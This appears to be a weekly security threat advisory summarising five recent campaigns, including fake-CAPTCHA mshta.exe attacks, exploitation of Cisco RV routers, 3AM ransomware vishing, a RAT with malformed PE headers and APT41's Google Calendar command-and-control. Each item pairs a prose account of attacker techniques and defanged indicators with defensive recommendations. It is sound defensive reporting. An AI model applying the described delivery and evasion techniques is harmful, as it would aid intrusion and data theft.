Multistage CAPTCHA-Based Attacks Use mshta.exe to Deliver RATs and Stealers

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents include:

1. Multistage CAPTCHA-Based Attacks Use mshta.exe to Deliver RATs and Stealers
2. Exploits in Cisco Routers to Build Global Honeypot Network for AitM Attacks
3. 3AM Ransomware Leveraging Vishing and Email Bombing for Data Theft and RA
4. Windows RAT Evading Detection Using Corrupted PE and DOS Headers
5. Google Calendar Exploited by APT41 for Stealthy Malware Command-and-Control Operations

These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Multistage CAPTCHA-Based Attacks Use mshta.exe to Deliver RATs and Stealers

A new phishing campaign exploits fake CAPTCHA pages to trick users into pasting malicious commands into the Windows Run dialog. Spread through SEO poisoning, malvertising, and phishing emails with urgent subject lines, the attack delivers obfuscated JavaScript embedded in MP3 or PDF files. These scripts execute in memory via tools like mshta.exe and PowerShell, deploying payloads such as Lumma Stealer, AsyncRAT, and XWorm. The malware abuses legitimate processes, uses DLL sideloading, and even spins up local web servers to avoid detection—posing serious risks to data integrity and operational continuity.

Recommendations to mitigate this threat include disabling the Windows Run dialog, enforcing least privilege access, blocking risky file-sharing platforms, and monitoring clipboard and process behavior. Harden browsers, enable memory protection, and implement application whitelisting. Conduct threat hunting for abnormal script activity and train users to recognize suspicious CAPTCHAs or command prompts. Finally, use network segmentation to restrict lateral movement and limit the blast radius of an infection.

2. ViciousTrap Exploits Router Flaw to Build Global Honeypot Network for AitM Attacks

A threat group dubbed ViciousTrap has exploited CVE-2023-20118 in Cisco Small Business RV routers, compromising over 5,300 edge devices across 84 countries. Using a custom shell script named NetGhost, the attackers redirect network traffic for adversary-in-the-middle (AitM) attacks while evading detection. The infection chain leverages ftpget and wget to download and execute NetGhost, which then removes itself to avoid forensic trails. The compromised devices include routers, VPNs, and DVRs from over 50 brands. Evidence suggests the campaign may be linked to Chinese-speaking actors and shares infrastructure with PolarEdge and GobRAT campaigns.

Recommendations to mitigate this threat include immediately patching vulnerable Cisco RV routers, blocking outbound traffic to known malicious IPs (e.g., 101.99.91[.]151), and monitoring for shell script activity involving ftpget and wget. Replace outdated devices, restrict access to router interfaces via IP whitelisting, and inspect for port redirection behaviors. Use internal honeypots and centralized syslog logging to detect lateral movement and AitM patterns early.

3. 3AM Ransomware Leverages Vishing and Email Bombing for Data Theft and RA

A 3AM ransomware affiliate launched a stealthy campaign combining email bombing and spoofed IT support calls to socially engineer employees into granting remote access. Once trust was gained, victims were tricked into using Microsoft Quick Assist to enable remote control. The attackers then delivered a ZIP archive containing QEMU virtualization, a malicious VBScript, and a Windows 7 disk image with the QDoor backdoor, enabling covert activity in an isolated virtual machine. Over nine days, 868 GB of data was exfiltrated via GoodSync to Backblaze, while Sophos tools blocked further lateral movement and ransomware deployment.

Recommendations to mitigate this threat include training users to identify vishing and spoofed IT outreach, disabling Quick Assist, and monitoring for QEMU or remote management tool misuse. Restrict PowerShell usage to signed scripts, enforce MFA, and audit admin accounts regularly. Limit VM and RDP usage, block unauthorized remote tools, and deploy XDR and IPS systems to detect C2 traffic and prevent data exfiltration attempts.

4. Windows RAT Evades Detection Using Corrupted PE and DOS Headers

Fortinet uncovered a stealthy malware campaign using a corrupted 64-bit PE file with intentionally malformed DOS and PE headers to evade static analysis. Delivered via PowerShell and PsExec, the malware ran in memory under dllhost.exe, functioning as a multi-threaded Remote Access Trojan (RAT). It communicated over TLS with the domain rushpapers[.]com, remaining dormant until triggered and enabling concurrent attacker sessions for prolonged access. Key functions included screenshot capture, service manipulation, and acting as a local server for attacker callbacks.

Recommendations to mitigate this threat include enforcing script execution controls for PowerShell and PsExec, performing regular memory forensics using EDR or dump analysis tools, and validating PE headers to flag malformed binaries. Monitor encrypted outbound traffic for anomalous TLS behavior, and segment networks to restrict lateral movement. Patch and securely configure remote access tools, and hunt for unusual activity from trusted but abused processes like dllhost.exe.

5. Google Calendar Exploited by APT41 for Malware Command-and-Control Operations

Chinese state-sponsored group APT41 deployed a stealthy campaign leveraging Google Calendar as a command-and-control (C2) channel for its malware TOUGHPROGRESS. The attack began with spear-phishing emails containing ZIP files that hid malicious LNK shortcuts disguised as PDFs. Once launched, the chain executed entirely in memory using PLUSDROP and PLUSINJECT, culminating in TOUGHPROGRESS, which used encrypted “zero-minute” calendar events for C2 communication. Google has since dismantled the malicious Calendar and associated infrastructure.

Recommendations to mitigate this threat include blocking unnecessary cloud services like calendar APIs, auditing cloud access logs, and monitoring for suspicious LNK and ZIP files. Deploy behavior-based endpoint detection to catch memory-only malware and process hollowing. Implement strong email filtering and sandboxing. Track known APT41 indicators and restrict interactions with unauthorized Google Workspace resources. These steps help limit exposure to stealthy malware exploiting legitimate platforms for covert operations.